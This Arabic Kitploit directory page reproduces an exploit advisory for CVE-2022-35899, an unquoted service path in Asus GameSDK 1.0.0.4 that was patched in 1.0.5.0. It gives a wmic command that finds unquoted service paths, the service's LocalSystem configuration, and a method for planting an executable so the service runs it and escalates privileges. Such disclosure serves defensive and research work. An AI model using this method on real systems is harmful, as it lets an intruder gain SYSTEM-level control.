Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-35899 — مسار خدمة غير محاط بعلامات اقتباس Asus GameSdk | Kitploit
أدوات/GitHubGitHub/angelopioamirante/cve-2022-35899
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالسوء التكوين
GitHubangelopioamirante/cve-2022-35899

CVE-2022-35899

مسار خدمة غير محاط بعلامات اقتباس Asus GameSdk

عرض المستودع
3منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-35899

مسار خدمة غير مقتبس في Asus GameSdk

عنوان الاستغلال: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' مسار خدمة غير مقتبس (تصعيد الامتيازات)

التاريخ: 07/14/2022

مؤلف الاستغلال: Angelo Pio Amirante

الإصدار: 1.0.0.4

اختُبر على: Windows 10

الإصدار المُصحَّح: 1.0.5.0

خطوة لاكتشاف مسار الخدمة غير المقتبس:

root@kitploit:~
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

معلومات عن الخدمة:

root@kitploit:~
C:\>sc qc "GameSDK Service"

[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

الاستغلال

إذا كان المهاجم قد اخترق النظام بالفعل وكان المستخدم الحالي يمتلك صلاحيات الكتابة في مجلد "C:\Program Files (x86)\ASUS" أو في "C:" ، فيمكنه وضع ملفات "Program.exe" أو "GameSDK.exe" الخاصة به على التوالي، وعند بدء تشغيل الخدمة، سيتم تشغيل الملف الخبيث بدلاً من الملف الأصلي "GameSDK.exe".

التأثير

يمكن للمهاجم رفع امتيازاته على النظام.

فيديو إثبات المفهوم

https://youtu.be/u_8JMIgn-5g

تنزيل الأداة